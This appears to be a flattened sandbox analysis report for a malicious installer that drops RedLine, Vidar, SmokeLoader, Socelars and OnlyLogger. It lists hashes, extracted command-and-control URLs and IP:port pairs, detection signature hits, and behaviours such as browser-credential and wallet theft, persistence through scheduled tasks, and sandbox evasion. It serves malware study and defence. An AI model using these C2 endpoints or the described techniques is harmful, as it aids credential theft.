Resubmissions
28-03-2022 07:58
220328-jty77adcdp 1025-03-2022 09:29
220325-lf232adhh3 125-03-2022 09:16
220325-k8tfxsaddl 1024-03-2022 20:10
220324-yx6trsdgg5 121-03-2022 09:00
220321-kyfgbaafh9 1021-03-2022 08:57
220321-kw1dpsafg5 420-03-2022 10:09
220320-l64pjscaen 1019-03-2022 11:38
220319-nr4gcaghhr 10Analysis
-
max time kernel
142s -
max time network
298s -
platform
windows10_x64 -
resource
win10-20220223-en -
submitted
19-03-2022 09:59
Static task
static1
General
-
Target
setup_x86_x64_install.exe
-
Size
6.2MB
-
MD5
d2f0cfac1c354f041c7b243f3df94d0a
-
SHA1
dfc03d06e799018485dc2dd72f997a0fef3d83a1
-
SHA256
3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c
-
SHA512
ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
redline
ANI
45.142.215.47:27643
Extracted
vidar
40.6
706
https://dimonbk83.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
50.9
1177
https://ieji.de/@sam7al
https://busshi.moe/@sam0al
-
profile_id
1177
Extracted
redline
nam22
103.133.111.182:44839
-
auth_value
3f8eb78d92dc3090929f5d0a3202a25f
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/2712-194-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/3952-484-0x0000000000C20000-0x0000000000D9C000-memory.dmp family_redline behavioral1/memory/2616-483-0x0000000001100000-0x0000000001319000-memory.dmp family_redline behavioral1/memory/2512-499-0x0000000000A10000-0x0000000000B8E000-memory.dmp family_redline behavioral1/memory/1020-491-0x0000000000F40000-0x00000000010DA000-memory.dmp family_redline behavioral1/memory/3616-482-0x0000000000ED0000-0x000000000103D000-memory.dmp family_redline behavioral1/memory/2616-511-0x0000000001100000-0x0000000001319000-memory.dmp family_redline behavioral1/memory/3616-508-0x0000000000ED0000-0x000000000103D000-memory.dmp family_redline behavioral1/memory/3952-506-0x0000000000C20000-0x0000000000D9C000-memory.dmp family_redline behavioral1/memory/2512-514-0x0000000000A10000-0x0000000000B8E000-memory.dmp family_redline behavioral1/memory/1020-525-0x0000000000F40000-0x00000000010DA000-memory.dmp family_redline behavioral1/memory/4908-562-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02dc626f48.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02dc626f48.exe family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3176-456-0x0000000002BC0000-0x0000000002C08000-memory.dmp family_onlylogger behavioral1/memory/3176-457-0x0000000000400000-0x0000000002B6B000-memory.dmp family_onlylogger -
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral1/memory/4080-444-0x00000000034B0000-0x0000000003584000-memory.dmp family_vidar behavioral1/memory/4080-445-0x0000000000400000-0x00000000017ED000-memory.dmp family_vidar behavioral1/memory/3404-520-0x0000000001220000-0x0000000001838000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS81843C7D\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS81843C7D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS81843C7D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 47 IoCs
Processes:
schtasks.exeschtasks.exeflow pid process 157 4072 schtasks.exe 158 4072 schtasks.exe 159 4072 schtasks.exe 160 4072 schtasks.exe 161 4072 schtasks.exe 162 4072 schtasks.exe 163 4072 schtasks.exe 164 4072 schtasks.exe 165 4072 schtasks.exe 166 4072 schtasks.exe 167 4072 schtasks.exe 168 4072 schtasks.exe 169 4072 schtasks.exe 170 4072 schtasks.exe 171 4072 schtasks.exe 173 4072 schtasks.exe 174 4072 schtasks.exe 175 4072 schtasks.exe 176 4072 schtasks.exe 177 4072 schtasks.exe 178 4072 schtasks.exe 179 4072 schtasks.exe 180 4072 schtasks.exe 181 4072 schtasks.exe 182 4072 schtasks.exe 183 4072 schtasks.exe 184 4072 schtasks.exe 185 4072 schtasks.exe 186 4072 schtasks.exe 187 4072 schtasks.exe 188 4072 schtasks.exe 189 4072 schtasks.exe 190 4072 schtasks.exe 191 4072 schtasks.exe 192 4072 schtasks.exe 193 4072 schtasks.exe 194 4072 schtasks.exe 195 4072 schtasks.exe 197 4072 schtasks.exe 198 4072 schtasks.exe 202 4072 schtasks.exe 203 4072 schtasks.exe 209 4072 schtasks.exe 221 4072 schtasks.exe 242 4184 schtasks.exe 309 4072 schtasks.exe 312 4072 schtasks.exe -
Downloads MZ/PE file
-
Executes dropped EXE 46 IoCs
Processes:
setup_installer.exesetup_install.exeTue026e94a5005f8.exeTue028a363eda.exeTue02705f9c2b455.exeTue02b2110095fe706.exeTue0289c99651.exeTue02976fcdf1.exeTue02522f9ea0b1.exeTue02520f255d0ba43a.exeTue029560e6534e190c.exeTue026e182673.exeTue02dc626f48.exeTue02b2110095fe706.tmpTue026e94a5005f8.exe9mY462s3yTdWVJsdLMD2MXyO.exevCQgq7S2ZR5kmKXJxq9g1Aqw.exeubrjWwfuEHnRNOnZpk9eDJlq.exe9OdO8v0parg16SfLr5bMHdbP.exers1_VJVIP8DPEax9kGMC96Hw.exekYMwQ32OKq7zQnxXp7BrDlts.exew3y2anFddwj_osJ0_lEoC7IY.exe9GWTG8i3nvtupPZ2ra_TrlSA.exereg.exeConhost.exereg.exeschtasks.exe0FCnF0_BrlJLT75NotEsPxCa.exeG1JrzcFsM9hGnpHqtVY3dd42.exeYOsUvWaaOc1lp6ZT7o7R18Kc.exeHqsgV3FhkOM4dbBi7zF2KTgl.exe4pBmbd6nkTbnGxGqVjb2dDx6.exem1LmhXPvGOQoiSspKdgH5n4Q.exeWaYnBtaz6iKflAOM5ysOyNdb.exeRGGojHFsgXQzdv8bcOkUGB5G.exesOxw8_KjNCeKKP7GsBVC_4W_.exeBS85BzMFmH8ttJ0hIjWHHRny.exed6_lGGWP0LYZvWwnyF9tqrMq.exeNOTEPAD.EXEInstall.exeoyegtY53s0CdlHuDdQpptyQm.exechrome.exeSystemSettings.exeInstall.exe9GWTG8i3nvtupPZ2ra_TrlSA.exeSta.exe.pifpid process 2072 setup_installer.exe 2456 setup_install.exe 1344 Tue026e94a5005f8.exe 1348 Tue028a363eda.exe 1416 Tue02705f9c2b455.exe 4092 Tue02b2110095fe706.exe 4076 Tue0289c99651.exe 1624 Tue02976fcdf1.exe 1788 Tue02522f9ea0b1.exe 4072 Tue02520f255d0ba43a.exe 4080 Tue029560e6534e190c.exe 3176 Tue026e182673.exe 1808 Tue02dc626f48.exe 3172 Tue02b2110095fe706.tmp 2712 Tue026e94a5005f8.exe 1744 9mY462s3yTdWVJsdLMD2MXyO.exe 64 vCQgq7S2ZR5kmKXJxq9g1Aqw.exe 3528 ubrjWwfuEHnRNOnZpk9eDJlq.exe 3384 9OdO8v0parg16SfLr5bMHdbP.exe 4036 rs1_VJVIP8DPEax9kGMC96Hw.exe 3284 kYMwQ32OKq7zQnxXp7BrDlts.exe 316 w3y2anFddwj_osJ0_lEoC7IY.exe 2744 9GWTG8i3nvtupPZ2ra_TrlSA.exe 4000 reg.exe 4016 Conhost.exe 3952 reg.exe 1456 schtasks.exe 3616 0FCnF0_BrlJLT75NotEsPxCa.exe 2408 G1JrzcFsM9hGnpHqtVY3dd42.exe 656 YOsUvWaaOc1lp6ZT7o7R18Kc.exe 204 HqsgV3FhkOM4dbBi7zF2KTgl.exe 2616 4pBmbd6nkTbnGxGqVjb2dDx6.exe 1020 m1LmhXPvGOQoiSspKdgH5n4Q.exe 3612 WaYnBtaz6iKflAOM5ysOyNdb.exe 2512 RGGojHFsgXQzdv8bcOkUGB5G.exe 3404 sOxw8_KjNCeKKP7GsBVC_4W_.exe 384 BS85BzMFmH8ttJ0hIjWHHRny.exe 4144 d6_lGGWP0LYZvWwnyF9tqrMq.exe 4576 NOTEPAD.EXE 4680 Install.exe 4884 oyegtY53s0CdlHuDdQpptyQm.exe 4812 chrome.exe 4908 SystemSettings.exe 4116 Install.exe 3644 9GWTG8i3nvtupPZ2ra_TrlSA.exe 1788 Sta.exe.pif -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue0289c99651.exe vmprotect C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue0289c99651.exe vmprotect behavioral1/memory/4076-168-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 13 IoCs
Processes:
setup_install.exeTue02b2110095fe706.tmptaskmgr.exeWaYnBtaz6iKflAOM5ysOyNdb.exesOxw8_KjNCeKKP7GsBVC_4W_.exeubrjWwfuEHnRNOnZpk9eDJlq.exepid process 2456 setup_install.exe 2456 setup_install.exe 2456 setup_install.exe 2456 setup_install.exe 2456 setup_install.exe 3172 Tue02b2110095fe706.tmp 3464 taskmgr.exe 3612 WaYnBtaz6iKflAOM5ysOyNdb.exe 3404 sOxw8_KjNCeKKP7GsBVC_4W_.exe 3404 sOxw8_KjNCeKKP7GsBVC_4W_.exe 3612 WaYnBtaz6iKflAOM5ysOyNdb.exe 3528 ubrjWwfuEHnRNOnZpk9eDJlq.exe 3528 ubrjWwfuEHnRNOnZpk9eDJlq.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com 90 ipinfo.io 91 ipinfo.io 207 ipinfo.io 208 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
reg.exe0FCnF0_BrlJLT75NotEsPxCa.exe4pBmbd6nkTbnGxGqVjb2dDx6.exem1LmhXPvGOQoiSspKdgH5n4Q.exesOxw8_KjNCeKKP7GsBVC_4W_.exeWaYnBtaz6iKflAOM5ysOyNdb.exeRGGojHFsgXQzdv8bcOkUGB5G.exepid process 3952 reg.exe 3616 0FCnF0_BrlJLT75NotEsPxCa.exe 2616 4pBmbd6nkTbnGxGqVjb2dDx6.exe 1020 m1LmhXPvGOQoiSspKdgH5n4Q.exe 3404 sOxw8_KjNCeKKP7GsBVC_4W_.exe 3612 WaYnBtaz6iKflAOM5ysOyNdb.exe 2512 RGGojHFsgXQzdv8bcOkUGB5G.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Tue026e94a5005f8.exeBS85BzMFmH8ttJ0hIjWHHRny.exe9GWTG8i3nvtupPZ2ra_TrlSA.exedescription pid process target process PID 1344 set thread context of 2712 1344 Tue026e94a5005f8.exe Tue026e94a5005f8.exe PID 384 set thread context of 4908 384 BS85BzMFmH8ttJ0hIjWHHRny.exe SystemSettings.exe PID 2744 set thread context of 3644 2744 9GWTG8i3nvtupPZ2ra_TrlSA.exe 9GWTG8i3nvtupPZ2ra_TrlSA.exe -
Drops file in Program Files directory 2 IoCs
Processes:
vCQgq7S2ZR5kmKXJxq9g1Aqw.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe vCQgq7S2ZR5kmKXJxq9g1Aqw.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe vCQgq7S2ZR5kmKXJxq9g1Aqw.exe -
Drops file in Windows directory 1 IoCs
Processes:
description ioc process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1812 2456 WerFault.exe setup_install.exe 3384 3176 WerFault.exe Tue026e182673.exe 3096 3176 WerFault.exe Tue026e182673.exe 3368 3176 WerFault.exe Tue026e182673.exe 3520 3176 WerFault.exe Tue026e182673.exe 1140 3176 WerFault.exe Tue026e182673.exe 1952 4080 WerFault.exe Tue029560e6534e190c.exe 844 3176 WerFault.exe Tue026e182673.exe 212 3176 WerFault.exe Tue026e182673.exe 2548 3176 WerFault.exe Tue026e182673.exe 1516 3176 WerFault.exe Tue026e182673.exe 4192 4000 WerFault.exe JCkKI7xFmN9wv_f98o0FGT3Y.exe 4184 3284 WerFault.exe kYMwQ32OKq7zQnxXp7BrDlts.exe 4452 1456 WerFault.exe RHRs9VMwETkZvTToe0k1cTSQ.exe 4492 4016 WerFault.exe oP2NjXBuWFyg8x_0VwbXQgHO.exe 5792 1456 WerFault.exe RHRs9VMwETkZvTToe0k1cTSQ.exe 4340 4016 WerFault.exe oP2NjXBuWFyg8x_0VwbXQgHO.exe 5820 4000 WerFault.exe JCkKI7xFmN9wv_f98o0FGT3Y.exe 5368 3284 WerFault.exe kYMwQ32OKq7zQnxXp7BrDlts.exe 4420 3176 WerFault.exe Tue026e182673.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Tue02522f9ea0b1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ubrjWwfuEHnRNOnZpk9eDJlq.exesOxw8_KjNCeKKP7GsBVC_4W_.exeWaYnBtaz6iKflAOM5ysOyNdb.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ubrjWwfuEHnRNOnZpk9eDJlq.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sOxw8_KjNCeKKP7GsBVC_4W_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sOxw8_KjNCeKKP7GsBVC_4W_.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 WaYnBtaz6iKflAOM5ysOyNdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WaYnBtaz6iKflAOM5ysOyNdb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ubrjWwfuEHnRNOnZpk9eDJlq.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4508 schtasks.exe 4440 schtasks.exe 192 schtasks.exe 5404 schtasks.exe 4900 schtasks.exe 4892 schtasks.exe 5688 schtasks.exe 4424 schtasks.exe 4184 schtasks.exe 4752 schtasks.exe 5568 schtasks.exe 2204 schtasks.exe 3600 schtasks.exe 4072 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 328 timeout.exe 192 timeout.exe 5460 timeout.exe 3540 timeout.exe 6104 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 6020 tasklist.exe 5524 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
chrome.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1480 taskkill.exe 4692 taskkill.exe 4520 taskkill.exe 4856 taskkill.exe -
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Internet Explorer\Toolbar Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies registry class 64 IoCs
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "4" Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "3" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 560031000000000057542c76100057696e646f777300400009000400efbe724a0b5d57542c762e0000006b050000000001000000000000000000000000000000e92a3001570069006e0064006f0077007300000016000000 Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local 